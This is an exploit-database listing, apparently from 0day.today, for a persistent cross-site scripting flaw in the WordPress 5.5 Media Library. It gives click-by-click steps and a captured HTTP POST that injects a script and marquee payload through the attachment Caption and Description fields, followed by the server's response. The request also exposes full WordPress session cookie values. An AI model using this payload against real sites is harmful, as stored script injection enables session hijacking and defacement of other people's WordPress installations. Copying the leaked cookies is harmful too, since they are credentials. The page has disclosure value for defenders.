[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress 5.5 Media Library Persistent Cross-Site Scripting Vulnerabilities

Author
vincent666winnie
Risk
[
Security Risk High
]
0day-ID
0day-ID-34895
Category
web applications
Date add
02-09-2020
Platform
php
Wordpress 5.5 Media Library Persistent Cross-Site Scripting Vulnerabilities

We have a persistent xss in the Wordpress 5.5 Media Library in admin panel.

I use for test demo site on cloudaccess.host with Wordpress 5.5

PoC:

"Create page "test"-->edit page -->search for a block --> click add
gallery--> media gallery--> click on picture and create new gallery-->
And we have fields "Caption" and "Description" vulnerable to xss and
html code injection. Put our codes in the fields and click Insert
gallery and publish/update.
Now you can click "View Page" or click on link with attachment .

Example:

https://winnie906test.cloudaccess.host/?page_id=23


https://winnie906test.cloudaccess.host/?attachment_id=38

Picture:


Our codes for test:

https://pastebin.com/8Us0Z0ff

Picture:

https://imgur.com/a/MLtRJes

https://imgur.com/a/XoVzL7h

Host: winnie906test.cloudaccess.host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://winnie906test.cloudaccess.host/wp-admin/upload.php?item=40
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 201
Origin: https://winnie906test.cloudaccess.host
Connection: keep-alive
Cookie: wordpress_sec_f9cca6de2084dd0b93297eb04ea8c315=lbbnmoqc%7C1598166988%7CqsFdmKzUiHfh6LTFR5fgCuRMVnyJBM6HUCmzvavxCKA%7Cef457f62462b8d3c115b8815e68b2589a75efa1aa81027d30d5f1483be025291; wordpress_logged_in_f9cca6de2084dd0b93297eb04ea8c315=lbbnmoqc%7C1598166988%7CqsFdmKzUiHfh6LTFR5fgCuRMVnyJBM6HUCmzvavxCKA%7C511e7018169257d054345c7822cb86b79f791805eaccabdaad7cb443c4cae1f2; wp-settings-time-2=1597994053; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1598000683; wp-settings-1=posts_list_mode%3Dlist%26libraryContent%3Dbrowse
action=save-attachment&id=40&nonce=34df5e62e8&post_id=0&changes[caption]="""><script>alert("fields vulnerable to xss")</script><marquee>html code injection</marquee>
POST: HTTP/1.1 200 OK
Date: Fri, 21 Aug 2020 09:47:28 GMT
Server: Apache
X-Powered-By: PHP/7.3.19
Access-Control-Allow-Origin: https://winnie906test.cloudaccess.host
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Keep-Alive: timeout=60
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/json; charset=UTF-8

#  0day.today [2024-12-23]  #